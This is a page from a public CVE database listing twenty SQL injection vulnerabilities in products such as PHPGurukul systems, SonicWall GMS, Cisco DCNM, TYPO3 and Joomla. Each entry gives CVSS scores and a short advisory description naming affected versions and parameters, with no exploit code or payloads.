Total
9311 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2020-5510 | 1 Phpgurukul | 1 Hostel Management System | 2020-01-10 | 10.0 HIGH | 9.8 CRITICAL |
| PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file. | |||||
| CVE-2013-3932 | 1 Jomres | 1 Jomres | 2020-01-09 | 6.5 MEDIUM | 8.8 HIGH |
| SQL injection vulnerability in the Jomres (com_jomres) component before 7.3.1 for Joomla! allows remote authenticated users with the "Business Manager" permission to execute arbitrary SQL commands via the id parameter in an editProfile action to administrator/index.php. | |||||
| CVE-2020-5307 | 1 Phpgurukul Dairy Farm Shop Management System Project | 1 Phpgurukul Dairy Farm Shop Management System | 2020-01-09 | 7.5 HIGH | 9.8 CRITICAL |
| PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. | |||||
| CVE-2019-7478 | 1 Sonicwall | 1 Global Management System | 2020-01-09 | 7.5 HIGH | 9.8 CRITICAL |
| A vulnerability in GMS allow unauthenticated user to SQL injection in Webservice module. This vulnerability affected GMS versions GMS 8.4, 8.5, 8.6, 8.7, 9.0 and 9.1. | |||||
| CVE-2019-20337 | 1 Advanced Real Estate Script Project | 1 Advanced Real Estate Script | 2020-01-09 | 6.5 MEDIUM | 7.2 HIGH |
| In PHP Scripts Mall advanced-real-estate-script 4.0.9, the news_edit.php news_id parameter is vulnerable to SQL Injection. | |||||
| CVE-2019-19732 | 1 Mfscripts | 1 Yetishare | 2020-01-08 | 6.5 MEDIUM | 7.2 HIGH |
| translation_manage_text.ajax.php and various *_manage.ajax.php in MFScripts YetiShare 3.5.2 through 4.5.3 directly insert values from the aSortDir_0 and/or sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection. | |||||
| CVE-2019-15985 | 1 Cisco | 1 Data Center Network Manager | 2020-01-08 | 9.0 HIGH | 7.2 HIGH |
| Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application. For more information about these vulnerabilities, see the Details section of this advisory. Note: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities advisory, published simultaneously with this one. | |||||
| CVE-2014-8673 | 1 Soplanning | 1 Soplanning | 2020-01-08 | 7.5 HIGH | 9.8 CRITICAL |
| Multiple SQL vulnerabilities exist in planning.php, user_list.php, projets.php, user_groupes.php, and groupe_list.php in Simple Online Planning (SOPPlanning)before 1.33. | |||||
| CVE-2017-18514 | 1 Simplerealtytheme | 1 Simple Login Log | 2020-01-07 | 7.5 HIGH | 9.8 CRITICAL |
| The simple-login-log plugin before 1.1.2 for WordPress has SQL injection. | |||||
| CVE-2019-19734 | 1 Mfscripts | 1 Yetishare | 2020-01-07 | 6.5 MEDIUM | 8.8 HIGH |
| _account_move_file_in_folder.ajax.php in MFScripts YetiShare 3.5.2 directly inserts values from the fileIds parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection. | |||||
| CVE-2015-5591 | 1 Zenphoto | 1 Zenphoto | 2020-01-06 | 6.5 MEDIUM | 7.2 HIGH |
| SQL injection vulnerability in Zenphoto before 1.4.9 allow remote administrators to execute arbitrary SQL commands. | |||||
| CVE-2019-6012 | 1 Tms-outsource | 1 Wpdatatables Lite | 2020-01-03 | 6.5 MEDIUM | 7.2 HIGH |
| SQL injection vulnerability in the wpDataTables Lite Version 2.0.11 and earlier allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors. | |||||
| CVE-2019-17527 | 1 Joomsky | 1 Js Jobs | 2020-01-02 | 7.5 HIGH | 9.8 CRITICAL |
| dataForDepandantField in models/custormfields.php in the JS JOBS FREE extension before 1.2.7 for Joomla! allows SQL Injection via the index.php?option=com_jsjobs&task=customfields.getfieldtitlebyfieldandfieldfo child parameter. | |||||
| CVE-2019-7484 | 1 Sonicwall | 2 Sma 100, Sma 100 Firmware | 2019-12-31 | 4.0 MEDIUM | 6.5 MEDIUM |
| Authenticated SQL Injection in SonicWall SMA100 allow user to gain read-only access to unauthorized resources using viewcacert CGI script. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. | |||||
| CVE-2019-18234 | 1 Equinoxce | 1 Control Expert | 2019-12-30 | 7.5 HIGH | 9.8 CRITICAL |
| Equinox Control Expert all versions, is vulnerable to an SQL injection attack, which may allow an attacker to remotely execute arbitrary code. | |||||
| CVE-2019-19850 | 1 Typo3 | 1 Typo3 | 2019-12-20 | 6.5 MEDIUM | 7.2 HIGH |
| An issue was discovered in TYPO3 before 8.7.30, 9.x before 9.5.12, and 10.x before 10.2.2. Because escaping of user-submitted content is mishandled, the class QueryGenerator is vulnerable to SQL injection. Exploitation requires having the system extension ext:lowlevel installed, and a valid backend user who has administrator privileges. | |||||
| CVE-2016-1000113 | 1 Huge-it | 1 Gallery | 2019-12-19 | 7.5 HIGH | 9.8 CRITICAL |
| XSS and SQLi in huge IT gallery v1.1.5 for Joomla | |||||
| CVE-2019-19846 | 1 Joomla | 1 Joomla\! | 2019-12-18 | 7.5 HIGH | 9.8 CRITICAL |
| In Joomla! before 3.9.14, the lack of validation of configuration parameters used in SQL queries caused various SQL injection vectors. | |||||
| CVE-2018-7282 | 1 Titool | 1 Printmonitor | 2019-12-18 | 7.5 HIGH | 9.8 CRITICAL |
| The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi. | |||||
| CVE-2009-5026 | 2 Mysql, Oracle | 2 Mysql, Mysql | 2019-12-17 | 6.8 MEDIUM | N/A |
| The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments. | |||||